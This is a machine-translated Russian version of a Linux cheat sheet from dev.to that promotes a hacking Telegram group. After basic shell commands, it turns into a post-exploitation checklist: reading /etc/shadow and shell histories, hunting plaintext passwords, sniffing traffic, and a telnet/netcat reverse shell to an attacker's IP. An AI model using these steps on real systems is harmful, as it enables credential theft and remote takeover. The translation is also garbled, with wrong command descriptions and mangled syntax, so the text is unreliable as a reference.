* Вы хотите стать этическим хакером и хотите знать, как хакеры взламывают в реальном мире. Присоединяйтесь к группе Telegram и будьте часть нас *
Телеграмма = https://t.me/infosecbugbounty
LS [перечисляет все файлы и каталоги в настоящем рабочем каталоге] LS-R [также перечисляет файлы в подзадачи] LS-A [также списки скрытых файлов] LS-Al [перечисляет файлы и каталоги с подробной информацией, такими как разрешения, размер, владелец и т. Д.]
CD или CD ~ [Перейдите к Home Directory] CD .. [Переместите на один уровень вверх] CD [для изменения в конкретный каталог] CD/[Перейти к корневому каталогу]
CAT> FILENAME [Создает новый файл] Имя файла CAT [отображает файл файл файла File1 File2> File3 [соединяет два файла (File1, File2) и сохраняет вывод в новом файле (File3)]]
Файл MV «Новый путь файла» [перемещает файлы в новое местоположение] MV FileName New_file_Name [Переименование файла в новое имя файла]
Sudo [позволяет постоянным пользователям запускать программы с привилегиями безопасности суперпользователя или корневого имени файла [удаляет файл] Человек [предоставляет информацию о помощи в истории команды, дает список всех прошлых команд, набранных в текущем сеансе терминала]
Очистить [очищает терминал] Mkdir DirectoryName [Создает новый каталог в настоящем рабочем каталоге или в указанном пути] rmdir [Удаляет каталог] MV [переименование каталога] pr -x [разделяет файл на столбцы x] pr -h [назначает заголовок файлу] pr -n [Обозначает файл с номерами строк] LP -NC, LPR C [печати «C» копии файла] LP-D LP-P [Указывает имя принтера] apt-get [Команда, используемая для установки и обновления пакетов]
mail -s ‘subject’ -c ‘cc -address’ -b ‘bcc -address’ ‘to -address’ (команда отправить электронную почту)
mail -s «субъект» (Команда отправить электронную почту с вложением) Команды разрешения файла
LS -L [чтобы показать тип файла и разрешение на доступ] R [разрешение на чтение] w [Записать разрешение] x [Выполнить разрешение] -= [Нет разрешения] Пользователь [ Для изменения права собственности на файл/каталог]
Пользователь Chown: Group FileName (измените пользователя, а также группу для файла или каталога)
Команда переменных среды echo $ переменная [для отображения значения переменной] эн [Отображает все переменные среды]
Variable_name = variable_value [Создать новую переменную] Unset [удалить переменную] Экспорт [чтобы установить значение переменная среды] Команды управления пользователями Linux
Sudo adduser username [для отображения значения переменной] sudo passwd -l ‘username’ [Отображает все переменные среды] sudo userdel -r ‘username’ [Создать новую переменную] sudo usermod -A -g GroupName имя пользователя [Удалить переменную] Sudo Deluser пользователь Group Name [ Чтобы установить значение переменной среды]
Сетевая команда
Ssh username@ip-address или hostname [Войдите в удаленную машину Linux с использованием SSH] Ping [для Ping и анализа сети и подключений хоста] DIR [Отображать файлы в текущем каталоге удаленного компьютера] CD «Dirname» [Изменить каталог на «dirname» на удаленном компьютере] Поместите файл [upload ‘file’ с локального к удаленному компьютеру] Получить файл [Загрузить ‘файл’ с удаленного на локальный компьютер] quit [logout]
Команда процесса
bg [для отправки процесса на фоновый] fg [Для запуска остановленного процесса на переднем плане] Top [Подробности обо всех активных процессах] PS [Дайте статус процессов, работающих для пользователя] PS PID [Дает статус конкретного процесса] pidof [дает идентификатор процесса (PID) процесса] Убить PID [Убивает процесс] Хороший [Запускает процесс с данным приоритетом] Renice [Изменит приоритет уже запущенного процесса] DF [Дает бесплатное место жесткого диска в вашей системе] БЕСПЛАТНО [Дает бесплатную оперативную память в вашей системе]
VI Редактирование команд
i [Вставьте в курсор (переходит в режим вставки)] [Записать после курсора (переходит в режим вставки)]] [Напишите в конце строки (переходит в режим вставки)] ESC [завершить режим вставки] u [отменить последний шанс] u [отменить все изменения во всю строку] o [Откройте новую линию (переходит в режим вставки)] DD [LEATE LINE] 3DD [Удалить 3 строки] D [Удалить содержимое линии после курсора] c [Удалить содержимое линии после курсора и вставьте новый текст. Нажмите клавишу ESC, чтобы завершить вставку.] DW [Удалить слово] 4DW [DELETE 4 слова] CW [Изменить слово] x [Удалить символ в курсоре] r [Заменить символ] r [перезаписывать символы из курсора [Замените одного символа под курсором продолжайте вставлять] S [Замените всю линию и начните вставлять в начале линии] ~ [Изменить случай индивидуального символа]
Операционная система
Какой тип распространения? Какая версия?
CAT/и т. Д./Выпуск CAT/и т. Д./*-высвобождение CAT/ETC/LSB-релиз
Какая версия ядра? Это 64-битный?
Cat/Proc/версия uname -a uname -mrs rpm -q kernel dmesg | grep linux ls/boot | grep vmlinuz-
Что можно узнать из переменных окружающей среды?
cat/etc/profile cat/etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set set
Есть принтер?
LPStat -a
Приложения и услуги
Какие услуги работают? В какой сервисе есть привилегия пользователя?
ps aux ps -ф Верхняя кошка/и т. Д./Услуги
Какие сервисы (ы) работают по корне? Из этих услуг, которые уязвимы
ps aux | grep root ps -ф | Грепский корень
Какие приложения установлены? Какая они версия? Они сейчас работают?
ls -alh/usr/bin/ls -alh/sbin/dpkg -l rpm -qa ls -alh/var/cache/apt/archiveso ls -alh/var/cache/yum/
Кто -нибудь из настроек службы (ы) неправильно настроена? Прикреплены ли какие -нибудь (уязвимые) плагины?
cat/etc/syslog.conf Cat/etc/chttp.conf cat/etc/lighttpd.conf cat/etc/cups/cupsd.conf Cat/etc/inetd.conf Cat/etc/apache2/apache2.conf Cat/etc/my.conf Cat/etc/httpd/conf/httpd.conf cat/opt/lampp/etc/httpd.conf ls -Arl/etc/| awk ‘$ 1 ~/^. r. /
Какие рабочие места запланированы?
crontab -l ls -alh/var/spool/cron ls -al/etc/| grep cron ls -al/etc/cron* cat/etc/cron* cat/etc/at.allow cat/etc/at.deny cat/etc/cron.allow cat/etc/cron.deny cat/etc/crontab cat/и т.д./anacrontab Cat/var/spool/cron/crontabs/root
Любые имена пользователей и/или пароли с простым текстом?
grep -i user [filename] grep -i pass [filename] grep -c 5 «пароль» [filename] Найти. -name «*.php» -print0 | xargs -0 grep -i -n «var $ password» # Joomla
Коммуникации и сетевые взаимодействия Что есть у системы? Это подключено к другой сети?
/sbin/ifconfig -a cat/etc/network/interfaces cat/etc/sysconfig/network
Какие настройки конфигурации сети? Что вы можете узнать об этой сети? DHCP -сервер? DNS -сервер? Ворота?
cat/etc/resolv.conf cat/etc/sysconfig/network cat/etc/networks iptables -l hostname dnsdomainname
Какие еще пользователи и хосты общаются с системой?
lsof -i lsof -i: 80 grep 80/etc/services netStat -Antup netStat -Antpx netStat -Tulpn CHKConfig -list CHKConfig -list | grep 3: на последнем w
Что кэшировано? IP и/или MAC -адреса
arp -e route/sbin/route -nee
Возможна ли пакет фырканье? Что можно увидеть? Слушайте живой трафик
TCPDUMP TCP DST 192.168.1.7 80 и TCP DST 10.5.5.252 21
Примечание: TCPDUMP TCP DST [ip] [порт] и TCP DST [IP] [порт]
У тебя есть оболочка? Можете ли вы взаимодействовать с системой?
NC -LVP 4444 # злоумышленник. Вход (Команды) NC -LVP 4445 # злоумышленник. Вывод (результаты) Telnet [злоумышленники IP] 44444 |/bin/sh | [локальный IP] 44445 # в системе целей. Используйте атакующие IP!
Конфиденциальная информация и пользователи, кто вы? Кто вошел в систему? Кто был вошел в систему? Кто еще здесь? Кто что может сделать?
ID, кто был последний кот/и т. Д./Пассвд | Cut -d: -f1 # Список пользователей grep -v -e «^ #»/etc/passwd | awk -f: ‘$ 3 {print $ 1}’ # Список супер пользователей awk -f: ‘($ 3) {print}’/и т. Д./passwd # список супер пользователей Cat/etc/sudoers sudo -l
Какие конфиденциальные файлы можно найти?
Cat/etc/passwd cat/etc/group cat/etc/shadow ls -alh/var/mail/
Что -нибудь «интересное» в домашней режиссере (ов)? Если можно получить доступ
ls -ahlr/root/ls -ahlr/home/
Есть ли какие -нибудь пароли; Сценарии, базы данных, файлы конфигурации или файлы журнала? Пути по умолчанию и местоположения для паролей
cat/var/apache2/config.inc cat/var/lib/mysql/mysql/user. Myd cat/root/anaconda-ks.cfg
Что делает пользователь? Есть ли какой -нибудь пароль в простом тексте? Что они были редть?
cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history
Какая информация пользователя можно найти?
Cat ~/.bashrc cat ~/.profile Cat/var/mail/root cat/var/spool/mail/root
Файлы поиска Grep шаблоны Файлы Поиск шаблона в файлах grep -i case нечувствительный поиск Grep -R Рекурсивный поиск grep -v Инвертированный поиск grep -o Показать соответствующую часть файла только find/dir/dir/dir/dir/dir/dir/dir/-name Имя* Найдите файлы, начинающиеся с имени в Dir Find/Dir/-user Имя Найти файлы, принадлежащие имени в Dir Find/Dir/-mmin num Найдите файлы, измененные менее чем Num Mitors назад в Dir, где команда, где можно найти Binary/Source/Руководство для команды, найдите файл, найдите файл (быстрый поиск системного индекса)
* Вы хотите стать этическим хакером и хотите знать, как хакеры взламывают в реальном мире. Присоединяйтесь к группе Telegram и будьте часть нас *
Telegram = https://t.me/infosecbugbounty
Оригинал: «https://dev.to/kiransethu46/ultimate-linux-cheat-sheet-4h3o»